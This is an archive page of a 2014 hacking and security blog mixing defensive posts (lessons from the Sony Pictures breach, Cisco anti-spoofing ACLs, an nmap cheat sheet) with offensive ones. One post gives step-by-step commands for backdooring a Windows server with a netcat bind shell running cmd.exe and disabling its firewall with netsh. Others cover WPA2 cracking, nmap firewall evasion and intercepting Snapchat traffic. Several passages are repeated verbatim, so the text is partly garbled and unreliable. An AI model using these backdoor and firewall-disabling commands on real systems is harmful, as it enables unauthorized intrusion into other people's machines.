Best Cyber trend news:
https://www.riskbasedsecurity.com/2014/12/a-breakdown-and-analysis-of-the-december-2014-sony-hack/
Keep your self up to date!
Friday, 26 December 2014
The Sony Pictures Hack: 5 short sharp lessons we all can learn!
The recent hacking of Sony Pictures offers valuable lessons in cybersecurity from which every company and consumer can learn. When you set aside the politics and gossip about nation states and Hollywood celebs, some practical implications are clear:
1. Don’t use email for sensitive communications
Why? If you need to ask you haven’t been reading the emails that hackers found on Sony Pictures’ computers and then leaked over the last few weeks. These join the countless other embarrassing and/or incriminating emails and images leaked over the years from assorted companies and government agencies. As the lawsuits against Sony Pictures mount, plaintiffs already possess evidence of the company’s lack of due care, no subpoena required. This evidence includes a critical IT auditor’s report that was reportedly shared via email as an unencrypted attachment.
Just to be clear: email is not a secure channel of communication. By default, email travels in plain text, readable to anyone snooping on the many connections and servers through which it travels. And emails that you send to someone are only as secure as that recipient and their computer. As for sharing sensitive documents as unencrypted email attachments, that should be against company policy, with severe repercussions for violators, whether they are C-level executives or hourly employees.
A good rule to live by is this: Never put anything in a digital communication that you wouldn’t want your mother (or enemies) to see. At this point in time, and for the foreseeable future, nobody can guarantee that those digital communications will never be hacked, leaked, subpoenaed, or otherwise made public. This applies to text messages, comments on web pages, messages on forums, and picture-sharing as well as email. In other words, this is really basic cyber-hygiene that has been common knowledge for decades, a fact that makes Sony Pictures’ apparent ignorance of digital realities all the more shocking.
2. Don’t give everybody access to everything
We’ve said it before and we’ll say it again: classify your documents and segment your networks. Sony Pictures could have saved itself a lot of grief if it had been enforcing a classification system that branded documents like contracts with actors and directors as Top Secret, and a policy that forbid the storing of Top Secret documents in an Internet accessible database. Too many organizations have grown their networks with maximum convenience in mind, effectively giving access to everything to everyone. Unfortunately, that means access to outsiders as well if there is even a small chink in your cyber-defenses.
Networks need to be segmented, with access controls between them to limit who can see what. Target learned this lesson the hard way last year, when hackers found it was possible to get from a supplier portal that the retailer had created, all the way to the card payment terminals in its stores. Now would be a good time to audit your networks for inappropriate connections and unfiltered access.
3. Don’t store passwords in a file called passwords
This lesson is as head-slappingly obvious as “Don’t write down your workstation password on a Post-it note and stick it to your monitor.” Yes, passwords are a pain, but there are secure methods of managing them. The failure of Sony Pictures to enforce a policy of not storing passwords in plain-easy-to-read-text will be one of the biggest strikes against them in court when employees whose privacy was violated in this attack bring suits claiming negligence.
4. Don’t ignore warning signs and risks
Many “ordinary” computer users already know this: if something seems wrong, don’t ignore it. Take a screenshot, write down the error message, call support, run an antivirus scan. Sometimes it turns out to be nothing, or even a new feature you didn’t know about. Other times it means you are under attack. Various parts of the Sony empire have been under attack for years now and many attacks have succeeded. That should have told Sony executives that IT security was a priority, even before Sony Pictures decided to proceed with a movie that was 100% guaranteed to upset at least one nuclear-armed nation already suspected of carrying out cyber attacks. Consider this statement:
“I’ve lost count of how many times Sony’s online properties have been hacked now—I just don’t have that many fingers—but it’s happened again. Databases used to operate sonypictures.com, sonybmg.nl, and sonybmg.be have been compromised…using SQL injection…being susceptible to SQL injection is embarrassing enough…but what makes this hack even worse is the data that has been compromised…with one major feature in common: they included plaintext passwords.”
That was Peter Bright writing in Ars Technica in June of 2011. Three years later, in June of 2014, Sony Pictures released a teaser trailer for The Interview, a film graphically depicting the North Korean dictator’s head exploding (in a sequence without which the director Seth Rogen, complained “the joke won’t”). In other words, Sony was forewarned, but not forearmed. We see a past history of weak security combined with a failure to tighten the hatches before proceeding with a project that was bound to cause anger in at least one part of the world.
5. Don’t go another day without an incident response plan
When news of the Sony Pictures breach started to leak, the company’s response demonstrated a lack of planning. Actions taken were sometimes contradictory or inflammatory. In short, the company clearly lacked an appropriate incident response plan. Why this should be is hard to fathom. One of the most consistent themes in IT security publications over the past few years has been: It’s not if you get hacked but when. In other words, any responsible organization will put in place a plan for responding to a breach. And stick to it when a breach occurs. Here’s a link to some good incident response advice that has been freely available for several years: NIST Special Publication 800-61 Revision 2: Computer Security Incident Handling Guide (.pdf).
Summary and sympathy
Some of these lessons are stark and obvious, but they should not obscure the fact that Sony Pictures has been victimized by criminal hackers. Drawing lessons from a crime is not the same as “victim blaming”. The failure to lock the door of your car does not make you culpable if it is stolen. We should never accept that crime is inevitable. At the same time, there are many layers of victimization in a crime of this magnitude. Current and former Sony employees who have had their lives turned upside down by the breach of privacy that these criminal hackers perpetrated have every right to seek redress from an organization that could fairly be said, just on the evidence published so far, to have failed the standard of due care for protection of its employees.
For additional perspective on this evolving situation, there is a good article in Businessweek and a detailed timeline on this blog. You might also want to monitor Krebs on Security, from Brian Krebs (he’s the guy who broke the Target breach story about this time last year, some lessons from which Sony failed to learned).
Saturday, 6 December 2014
HOW TO CRACK WPA2 USING A DICTIONARY ATTACK
Here is a tutorial showing you how to hack a WPA2 Wifi password by capturing a 4 way handshake and then running a dictionary attack against the capture file.
If you require a wordlist then i have linked a few below this video:
- http://ftp.sunet.se/pub/security/too…all/wordlists/
- ftp://ftp.ox.ac.uk/pub/wordlists/
- http://gdataonline.com/downloads/GDict/
- ftp://ftp.openwall.com/pub/wordlists/
- ftp://ftp.cerias.purdue.edu/pub/dict/
- http://www.indianz.ch/tools/doc/wordlist.zip
- http://www.outpost9.com/files/WordLists.html
- ftp://ftp.openwall.com/pub/wordlists/passwords/
- English and French: https://www.securinfos.info/wordlists_dictionnaires.php
- Virtually every language: ftp://ftp.ox.ac.uk/pub/wordlists/
- http://www.lostpassword.com/f/wl/bigdict.zip
- http://www.lostpassword.com/f/wl/French.zip
- http://www.lostpassword.com/f/wl/Spanish.zip
- http://www.lostpassword.com/f/wl/German.zip
- http://www.vulnerabilityassessment.co.uk/passwords.htm
- http://packetstormsecurity.org/Crackers/wordlists/
- http://www.ai.uga.edu/ftplib/natural-language/moby/
- Cotse has possibly one of the largest collections of word lists (including French). http://www.cotse.com
- http://www.cotse.com/tools/wordlists1.htm
- http://www.cotse.com/tools/wordlists2.htm
Best of Luck guys!
HOW TO BYPASSING FIREWALL ON A WEB SERVER
The key point of this paper is to discuss how to backdoor a windows test server and bypass its’ firewall.
So this is a few steps to bypass firewall easily:
Tools:
1. Netcat
For those who don’t know how to make netcat backdoor, must read this. If you’re just interested to bypassing firewall skip it.
Very first I will show you to make a backdoor using net cat:
Upload netcat on remote pc and making a listening port.
For example.
C:\>nc –l –p 8080
[on 192.168.9.2]
So here we are making 8080 as the listening port
The next step is to connect 192.168.9.2 through remote system.
For that we need to install netcat on 192.168.9.2 and execute cmd prompt.
So here is the command we need to run on 192.168.9.2
C:\>nc –l –p 8080 –e cmd.exe
For example.
C:\>nc –l –p 8080
[on 192.168.9.2]
So here we are making 8080 as the listening port
The next step is to connect 192.168.9.2 through remote system.
For that we need to install netcat on 192.168.9.2 and execute cmd prompt.
So here is the command we need to run on 192.168.9.2
C:\>nc –l –p 8080 –e cmd.exe
u can use putty to connect
Just type the address 192.168.9.2 and specify the port no. 8080
Once u connect u will get the command prompt this way u can make a backdoor connect
on win server.
After getting the command prompt u can disable firewall if required by command line
C:\>netsh firewall set opmode disable
Or
Use
C:\Windows\System32\netsh.exe “firewall set opmode = DISABLE profile = ALL”
Just type the address 192.168.9.2 and specify the port no. 8080
Once u connect u will get the command prompt this way u can make a backdoor connect
on win server.
After getting the command prompt u can disable firewall if required by command line
C:\>netsh firewall set opmode disable
Or
Use
C:\Windows\System32\netsh.exe “firewall set opmode = DISABLE profile = ALL”
when it comes to real scenario – most of the web servers block rdp connection in the sense they block inbound traffic on port no. 3389
[IIS Webserver]————-[=Firewall=]————-attacker
So the firewall rules will be
Allow traffic on 80, 443. Deny all * exception on 80 and 443*
So when we try to make rdp connection from external network it fails. There are few methods where we can trick the firewall by running netcat on 443 or anyother open port on server. We just need to run netcat on 443 because the firewall allows 443 traffic.
[IIS Webserver]————-[=Firewall=]————-attacker
So the firewall rules will be
Allow traffic on 80, 443. Deny all * exception on 80 and 443*
So when we try to make rdp connection from external network it fails. There are few methods where we can trick the firewall by running netcat on 443 or anyother open port on server. We just need to run netcat on 443 because the firewall allows 443 traffic.
OR YOU CAN USE RDP
The tools specified above can be freely downloaded online. You can contact me on egbe201@yahoo.com for further information. Best of Luck!
Wednesday, 3 December 2014
DOWNLOAD FREE WIFI HACKING AND DEFENCE
(PDF PRESENTATION)-This is only for
educational purpose!
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Here is a Free WiFi Hacking PDF that will teach you how all about how the 802.11 protocol works as well as how to hack WEP, WPA, WPA2 and WPS as well as how to protect against it.
1 – The following discussion is for informational and education purpose only.
2 – Hacking into private network without the written permission from the owner is Illegal and strictly forbidden.
3 – Misused could result in breaking the law so use it at your own risk.
2 – Hacking into private network without the written permission from the owner is Illegal and strictly forbidden.
3 – Misused could result in breaking the law so use it at your own risk.
Sunday, 16 November 2014
Network Scanning a Vulnerable Test Server Using Nmap
Watch this Video: http://www.youtube.com/watch?v=0UwW27FuS5s
Friday, 14 November 2014
Types of Denial of Service Attack 1
Smurf Attack:
Smurf Attack:
This form of an attack involves sending Internet Control Message Protocol (ICMP) or ping requests to multiple Internet Protocol (IP) broadcast addresses. All of these messages have a spoofed source address of the intended victim. The hosts receiving the ICMP echo request upon accepting it reply with an echo to the source address, which in this case is the target of the attack. The weight of this attack is therefore effectively multiplied by the number of responding hosts. If the attack took place on a multi-broadcast network there could potentially be hundreds of machines to reply to each packet sent.
UDP Flood:
A UDP flood, also known as a fraggle, is a cousin to the Smurf attack. This is based on UDP echo and character generator (chargen). It uses a forged UDP packet to connect the echo service on one machine to the chargen on another. These two machines then use up all available bandwidth, sending characters back and forth between themselves.
A UDP flood, also known as a fraggle, is a cousin to the Smurf attack. This is based on UDP echo and character generator (chargen). It uses a forged UDP packet to connect the echo service on one machine to the chargen on another. These two machines then use up all available bandwidth, sending characters back and forth between themselves.
SYN Flood:
A SYN flood exploits the TCP standard 3-way handshake protocol. The attacker initiates a connect request to the server and then ignores the acknowledgement (ACK). This forces the server to wait for the ACK from the attacker, wasting time and resources. A server can at any given time only process a fixed number of requests and so this form of attack can effectively block all legitimate traffic.
A SYN flood exploits the TCP standard 3-way handshake protocol. The attacker initiates a connect request to the server and then ignores the acknowledgement (ACK). This forces the server to wait for the ACK from the attacker, wasting time and resources. A server can at any given time only process a fixed number of requests and so this form of attack can effectively block all legitimate traffic.
The following are examples of distributed denial of service attacks and the way in which the zombie machines in each case are controlled. There are numerous variations of this kind of attack in existence.
We will post the next lesson shortly!
Prevent IP spoofing with the Cisco IOS
In a typical IP address spoofing attempt, the attacker fakes the source of packets in order to appear as part of an internal network. David Davis tells you three ways you can make an attacker's life more difficult—and prevent IP address spoofing.
As you know, the Internet is rife with security threats, and one such threat is IP address spoofing. During a typical IP address spoofing attempt, the attacker simply fakes the source of packets in order to appear as part of an internal network. Let's discuss three ways you can protect your organization from this type of attack.
Block IP addresses
The first step in preventing spoofing is blocking IP addresses that pose a risk. While there can be a reason that an attacker might spoof any IP address, the most commonly spoofed IP addresses are private IP addresses (RFC 1918) and other types of shared/special IP addresses.
Here's a list of IP addresses—and their subnet masks—that I would block from coming into my network from the Internet:
- 10.0.0.0/8
- 172.16.0.0/12
- 192.168.0.0/16
- 127.0.0.0/8
- 224.0.0.0/3
- 169.254.0.0/16
All of the above are either private IP addresses that aren't routable on the Internet or used for other purposes and shouldn't be on the Internet at all. If traffic comes in with one of these IP addresses from the Internet, it must be fraudulent traffic.
In addition, other commonly spoofed IP addresses are whatever internal IP addresses your organization uses. If you're using all private IP addresses, your range should already fall into those listed above. However, if you're using your own range of public IP addresses, you need to add them to the list.
Implement ACLs
The easiest way to prevent spoofing is using an ingress filter on all Internet traffic. The filter drops any traffic with a source falling into the range of one of the IP networks listed above. In other words, create an access control list (ACL) to drop all inbound traffic with a source IP in the ranges above.
Here's a configuration example:
Router# conf t Enter configuration commands, one per line. End with CNTL/Z. Router(config)# ip access-list ext ingress-antispoof Router(config-ext-nacl)# deny ip 10.0.0.0 0.255.255.255 any Router(config-ext-nacl)# deny ip 172.16.0.0 0.15.255.255 any Router(config-ext-nacl)# deny ip 192.168.0.0 0.0.255.255 any Router(config-ext-nacl)# deny ip 127.0.0.0 0.255.255.255 any Router(config-ext-nacl)# deny ip 224.0.0.0 31.255.255.255 any Router(config-ext-nacl)# deny ip 169.254.0.0 0.0.255.255 any Router(config-ext-nacl)# permit ip any any Router(config-ext-nacl)# exit Router(config)#int s0/0 Router(config-if)#ip access-group ingress-antispoof in
Internet service providers (ISPs) must use filtering like this on their networks, as defined in RFC 2267. Notice how this ACL includes permit ip any any at the end. In the "real world," you would probably have a stateful firewall inside this router that protects your internal LAN.
Of course, you could take this to the extreme and filter all inbound traffic from other subnets in your internal network to make sure that someone isn't on one subnet and spoofing traffic to another network. You could also implement egress ACLs to prevent users on your network from spoofing IP addresses from other networks. Keep in mind that this should be just one part of your overall network security strategy.
Use reverse path forwarding (ip verify)
Another way to protect your network from IP address spoofing is reverse path forwarding (RPF)—or ip verify. In the Cisco IOS, the commands for reverse path forwarding begin with ip verify.
RPF works much like part of an anti-spam solution. That part receives inbound e-mail messages, takes the source e-mail address, and performs a recipient lookup on the sending server to determine if the sender really exists on the server the message came from. If the sender doesn't exist, the server drops the e-mail message because there's no way to reply to the message—and it's very likely spam.
RPF does something similar with packets. It takes the source IP address of a packet received from the Internet and looks up to see if the router has a route in its routing table to reply to that packet. If there's no route in the routing table for a response to return to the source IP, then someone likely spoofed the packet, and the router drops the packet.
Here's how to configure RPF on your router:
Router(config)# ip cef Router(config)# int serial0/0 Router(config-if)# ip verify unicast reverse-path
Note that this won't work on a multi-homed network.
It's important to protect your private network from attackers on the Internet. These three methods can go a long way toward protecting against IP address spoofing. For more information on IP address spoofing, read "IP Address Spoofing: An Introduction."
IT SECURITY POLICY TEMPLATES:
http://www.comptechdoc.org/independent/security/policies/antivirus-policy.html
http://www.comptechdoc.org/independent/security/policies/antivirus-policy.html
See realtime Cyber attacks with DDoS Attack Map
DDoS attacks
DDoS attacks are a calculated effort to hit an online service where it matters: uptime. Bringing down a service is achieved by spamming it heavily with traffic from different places by tapping into various computers and requesting them to access the target.The DDoS attack map shows all the current attacks happening in real time all over the world. Going around the map, you can see where the attack is coming from, who the target is and the severity of the attack based on a variety of factors.
It’s an amazing visual to see all the attacks going on at one time, sort of like a colorful rainbow of terror. You can also use the cursor at the bottom to drag to a different date, allowing you to see heavier and lighter days and how that translates to the map.Protecting yourself from a DDoS attack is crucial for online services—going down due to an attack can not only be bad for your data, but also for your business’ visibility and brand. Taking the necessary steps to be proactive about DDoS attacks can go a long way in saving you some stress and frustration.
Setting up a firewall that alerts you of any potential intrusions, network monitoring and managed services can be a great deterrent or prevent some cyber threats.
Overall, this is a great tool if you ever wanted to see what’s going on in the world of cyber security on any given day.
Monday, 10 November 2014
AirHopper: Using FM Radio SignalsHacking Into an Isolated Computers.
Security researchers at the Cyber Security Labs at Ben Gurion University in Israel have found a way to snoop on a personal computer even with no network connection.
STEALING DATA USING RADIO SIGNALS
Researchers have developed a proof-of-concept malware that can infiltrate a closed network to lift data from a machine that has been kept completely isolated from the internet or any Wi-Fi connection by using little more than a mobile phone’s FM radio signals.
Researcher Mordechai Guri, along with Professor Yuval Elovici of Ben Gurion University, presented the research on Thursday in the 9th IEEE International Conference on Malicious and Unwanted Software (MALCON 2014) held at Denver.
This new technology is known as ‘AirHopper’ — basically a keylogger app to track what is being typed on the computer or the mobile phone.
AirHopper is a special type of keylogger because it uses radio frequencies to transmit data from a computer, all by exploiting the computer's monitor display, in order to evade air-gap security measures.
"This is the first time that a mobile phone is considered in an attack model as the intended receiver of maliciously crafted radio signals emitted from the screen of the isolated computer," according to arelease by Ben Gurion University.
HOW DOES AIRHOPPER WORK ?
The technology works by using the FM radio receiver included in some mobile phones. AirHopper is able to capture keystrokes by intercepting certain radio emissions from the monitor or display unit of the isolated computer.
The researchers can then pick up the FM signals on a nearby smartphone and translate the FM signals into the typed text.
LIMITATIONS
The technique is completely new, although it has some limitations. The team claims that textual and binary information can be gathered from a distance of up to 7 meters with an effective FM-bandwidth of 13-60 bps (bytes per second).
"AirHopper demonstrates how textual and binary data can be exfiltrated from physically a (sic) isolated computer to mobile phones at a distance of 1-7 meters, with effective bandwidth of 13-60 (bytes per second). Enough to steal a secret password."
This, according to researchers, is enough to steal a secret password. Therefore, in an effort to obtain secret data an attacker can infect a mobile phone of someone from the staff using AirHopper method worked in stealth mode, and then transmit the data.
VIDEO DEMONSTRATION AND POTENTIAL DANGER
Researchers have also provide the Proof-of-concept video, so you can Watch the demonstration video and find out if you should be worried or not.
Video link: http://www.youtube.com/watch?v=2OzTWiGl1rM
According to the researchers, the Airhopper technique of data theft was developed by the University in order to protect against potential intrusions of its kind in the future.
"Such technique can be used potentially by people and organizations with malicious intentions and we want to start a discussion on how to mitigate this newly presented risk." said Dudu Mimran, chief technology officer of the Ben Gurion University’s cyber security labs.
Saturday, 8 November 2014
Snapception: Intercept and Decrypt All Snapchats Received Over Your Network
Snapception: Intercept and decrypt all Snapchats received over your network.
Installing is easy:
pip install snapception
Starting it is easy too:
snapception --help
Usage: snapception [OPTIONS]
Options:
-v, --verbose Enable logging
-vv, --very-verbose Include mitmdump in logging
-o, --output TEXT Specify output directory (Default is ~/snaps)
--help Show this message and exit.
Configuring:
Configure your device to use a proxy pointing to Port 8080 of the host computer
Install a CA on your device by visiting mitm.it once connected to the proxy
Watch all the Snapchats you receive over the network become available on your computer.
Snapception, intercepts all snapchats received over the network so long as the receiving device is connected to the computer running Snapception via a proxy. Those applications also require you to manually login and save your snapchat before officially opening it; Snapception automatically intercepts, decrypts, and saves your received snaps.
Download
NMAP (Network Mapping) Cheat Sheet
Step 1: Open up the console and type nmap
It will give you the whole commands of Nmap. But we are here to understanding the commands so we should go ahead.
Here is the cheatsheet of NMAP.
BASIC SCANNING TECHNIQUES
| Goal | Command | Example |
| Scan a Single Target | nmap [target] | nmap 192.168.0.1 |
| Scan Multiple Targets | nmap [target1, target2, etc] | nmap 192.168.0.1 192.168.0.2 |
| Scan a List of Targets | nmap -iL [list.txt] | nmap -iL targets.txt |
| Scan a Range of Hosts | nmap [range of ip addresses] | nmap 192.168.0.1-10 |
| Scan an Entire Subnet | nmap [ip address/cdir] | nmap 192.168.0.1/24 |
| Scan Random Hosts | nmap -iR [number] | nmap -iR 0 |
| Excluding Targets from a Scan | nmap [targets] --exclude [targets] | nmap 192.168.0.1/24 --exclude 192.168.0.100, 192.168.0.200 |
| Excluding Targets Using a List | nmap [targets] --excludefile [list.txt] | nmap 192.168.0.1/24 --excludefile notargets.txt |
| Perform an Aggressive Scan | nmap -A [target] | nmap -A 192.168.0.1 |
| Scan an IPv6 Target | nmap -6 [target] | nmap -6 1aff:3c21:47b1:0000:0000:0000:0000:2afe |
DISCOVERY OPTIONS
| Goal | Command | Example |
| Perform a Ping Only Scan | nmap -sP [target] | nmap -sP 192.168.0.1 |
| Don’t Ping | nmap -PN [target] | nmap -PN 192.168.0.1 |
| TCP SYN Ping | nmap -PS [target] | nmap -PS 192.168.0.1 |
| TCP ACK Ping | nmap -PA [target] | nmap -PA 192.168.0.1 |
| UDP Ping | nmap -PU [target] | nmap -PU 192.168.0.1 |
| SCTP INIT Ping | nmap -PY [target] | nmap -PY 192.168.0.1 |
| ICMP Echo Ping | nmap -PE [target] | nmap -PE 192.168.0.1 |
| ICMP Timestamp Ping | nmap -PP [target] | nmap -PP 192.168.0.1 |
| ICMP Address Mask Ping | nmap -PM [target] | nmap -PM 192.168.0.1 |
| IP Protocol Ping | nmap -PO [target] | nmap -PO 192.168.0.1 |
| ARP Ping | nmap -PR [target] | nmap -PR 192.168.0.1 |
| Traceroute | nmap --traceroute [target] | nmap --traceroute 192.168.0.1 |
| Force Reverse DNS Resolution | nmap -R [target] | nmap -R 192.168.0.1 |
| Disable Reverse DNS Resolution | nmap -n [target] | nmap -n 192.168.0.1 |
| Alternative DNS Lookup | nmap --system-dns [target] | nmap --system-dns 192.168.0.1 |
| Manually Specify DNS Server(s) | nmap --dns-servers [servers] [target] | nmap --dns-servers 201.56.212.54 192.168.0.1 |
| Create a Host List | nmap -sL [targets] | nmap -sL 192.168.0.1/24 |
ADVANCED SCANNING OPTIONS
| Goal | Command | Example |
| TCP SYN Scan | nmap -sS [target] | nmap -sS 192.168.0.1 |
| TCP Connect Scan | nmap -sT [target] | nmap -sT 192.168.0.1 |
| UDP Scan | nmap -sU [target] | nmap -sU 192.168.0.1 |
| TCP NULL Scan | nmap -sN [target] | nmap -sN 192.168.0.1 |
| TCP FIN Scan | nmap -sF [target] | nmap -sF 192.168.0.1 |
| Xmas Scan | nmap -sX [target] | nmap -sX 192.168.0.1 |
| TCP ACK Scan | nmap -sA [target] | nmap -sA 192.168.0.1 |
| Custom TCP Scan | nmap --scanflags [flags] [target] | nmap --scanflags SYNFIN 192.168.0.1 |
| IP Protocol Scan | nmap -sO [target] | nmap -sO 192.168.0.1 |
| Send Raw Ethernet Packets | nmap --send-eth [target] | nmap --send-eth 192.168.0.1 |
| Send IP Packets | nmap --send-ip [target] | nmap --send-ip 192.168.0.1 |
PORT SCANNING OPTIONS
| Goal | Command | Example |
| Perform a Fast Scan | nmap -F [target] | nmap -F 192.168.0.1 |
| Scan Specific Ports | nmap -p [port(s)] [target] | nmap -p 21-25,80,139,8080 192.168.1.1 |
| Scan Ports by Name | nmap -p [port name(s)] [target] | nmap -p ftp,http* 192.168.0.1 |
| Scan Ports by Protocol | nmap -sU -sT -p U:[ports],T:[ports] [target] | nmap -sU -sT -p U:53,111,137,T:21-25,80,139,8080 192.168.0.1 |
| Scan All Ports | nmap -p '*' [target] | nmap -p '*' 192.168.0.1 |
| Scan Top Ports | nmap --top-ports [number] [target] | nmap --top-ports 10 192.168.0.1 |
| Perform a Sequential Port Scan | nmap -r [target] | nmap -r 192.168.0.1 |
VERSION DETECTION
| Goal | Command | Example |
| Operating System Detection | nmap -O [target] | nmap -O 192.168.0.1 |
| Submit TCP/IP Fingerprints | www.nmap.org/submit/ | |
| Attempt to Guess an Unknown OS | nmap -O --osscan-guess [target] | nmap -O --osscan-guess 192.168.0.1 |
| Service Version Detection | nmap -sV [target] | nmap -sV 192.168.0.1 |
| Troubleshooting Version Scans | nmap -sV --version-trace [target] | nmap -sV --version-trace 192.168.0.1 |
| Perform a RPC Scan | nmap -sR [target] | nmap -sR 192.168.0.1 |
TIMING OPTIONS
| Goal | Command | Example |
| Timing Templates | nmap -T[0-5] [target] | nmap -T3 192.168.0.1 |
| Set the Packet TTL | nmap --ttl [time] [target] | nmap --ttl 64 192.168.0.1 |
| Minimum # of Parallel Operations | nmap --min-parallelism [number] [target] | nmap --min-parallelism 10 192.168.0.1 |
| Maximum # of Parallel Operations | nmap --max-parallelism [number] [target] | nmap --max-parallelism 1 192.168.0.1 |
| Minimum Host Group Size | nmap --min-hostgroup [number] [targets] | nmap --min-hostgroup 50 192.168.0.1 |
| Maximum Host Group Size | nmap --max-hostgroup [number] [targets] | nmap --max-hostgroup 1 192.168.0.1 |
| Maximum RTT Timeout | nmap --initial-rtt-timeout [time] [target] | nmap --initial-rtt-timeout 100ms 192.168.0.1 |
| Initial RTT Timeout | nmap --max-rtt-timeout [TTL] [target] | nmap --max-rtt-timeout 100ms 192.168.0.1 |
| Maximum Retries | nmap --max-retries [number] [target] | nmap --max-retries 10 192.168.0.1 |
| Host Timeout | nmap --host-timeout [time] [target] | nmap --host-timeout 30m 192.168.0.1 |
| Minimum Scan Delay | nmap --scan-delay [time] [target] | nmap --scan-delay 1s 192.168.0.1 |
| Maximum Scan Delay | nmap --max-scan-delay [time] [target] | nmap --max-scan-delay 10s 192.168.0.1 |
| Minimum Packet Rate | nmap --min-rate [number] [target] | nmap --min-rate 50 192.168.0.1 |
| Maximum Packet Rate | nmap --max-rate [number] [target] | nmap --max-rate 100 192.168.0.1 |
| Defeat Reset Rate Limits | nmap --defeat-rst-ratelimit [target] | nmap --defeat-rst-ratelimit 192.168.0.1 |
FIREWALL EVASION TECHNIQUES
| Goal | Command | Example |
| Fragment Packets | nmap -f [target] | nmap -f 192.168.0.1 |
| Specify a Specific MTU | nmap --mtu [MTU] [target] | nmap --mtu 32 192.168.0.1 |
| Use a Decoy | nmap -D RND:[number] [target] | nmap -D RND:10 192.168.0.1 |
| Idle Zombie Scan | nmap -sI [zombie] [target] | nmap -sI 192.168.0.38 192.168.0.1 |
| Manually Specify a Source Port | nmap --source-port [port] [target] | nmap --source-port 1025 192.168.0.1 |
| Append Random Data | nmap --data-length [size] [target] | nmap --data-length 20 192.168.0.1 |
| Randomize Target Scan Order | nmap --randomize-hosts [target] | nmap --randomize-hosts 192.168.0.1-20 |
| Spoof MAC Address | nmap --spoof-mac [MAC|0|vendor] [target] | nmap --spoof-mac Cisco 192.168.0.1 |
| Send Bad Checksums | nmap --badsum [target] | nmap --badsum 192.168.0.1 |
OUTPUT OPTIONS
| Goal | Command | Example |
| Save Output to a Text File | nmap -oN [scan.txt] [target] | nmap -oN scan.txt 192.168.0.1 |
| Save Output to a XML File | nmap -oX [scan.xml] [target] | nmap -oX scan.xml 192.168.0.1 |
| Grepable Output | nmap -oG [scan.txt] [targets] | nmap -oG scan.txt 192.168.0.1 |
| Output All Supported File Types | nmap -oA [path/filename] [target] | nmap -oA ./scan 192.168.0.1 |
| Periodically Display Statistics | nmap --stats-every [time] [target] | nmap --stats-every 10s 192.168.0.1 |
| 133t Output | nmap -oS [scan.txt] [target] | nmap -oS scan.txt 192.168.0.1 |
TROUBLESHOOTING AND DEBUGGING
| Goal | Command | Example |
| Getting Help | nmap -h | nmap -h |
| Display Nmap Version | nmap -V | nmap -V |
| Verbose Output | nmap -v [target] | nmap -v 192.168.0.1 |
| Debugging | nmap -d [target] | nmap -d 192.168.0.1 |
| Display Port State Reason | nmap --reason [target] | nmap --reason 192.168.0.1 |
| Only Display Open Ports | nmap --open [target] | nmap --open 192.168.0.1 |
| Trace Packets | nmap --packet-trace [target] | nmap --packet-trace 192.168.0.1 |
| Display Host Networking | nmap --iflist | nmap --iflist |
| Specify a Network Interface | nmap -e [interface] [target] | nmap -e eth0 192.168.0.1 |
NMAP SCRIPTING ENGINE
| Goal | Command | Example |
| Execute Individual Scripts | nmap --script [script.nse] [target] | nmap --script banner.nse 192.168.0.1 |
| Execute Multiple Scripts | nmap --script [expression] [target] | nmap --script 'http-*' 192.168.0.1 |
| Script Categories | all, auth, default, discovery, external, intrusive, malware, safe, vuln | |
| Execute Scripts by Category | nmap --script [category] [target] | nmap --script 'not intrusive' 192.168.0.1 |
| Execute Multiple Script Categories | nmap --script [category1,category2,etc] | nmap --script 'default or safe' 192.168.0.1 |
| Troubleshoot Scripts | nmap --script [script] --script-trace [target] | nmap --script banner.nse --script-trace 192.168.0.1 |
| Update the Script Database | nmap --script-updatedb | nmap --script-updatedb |
Download NMap
Subscribe to:
Posts (Atom)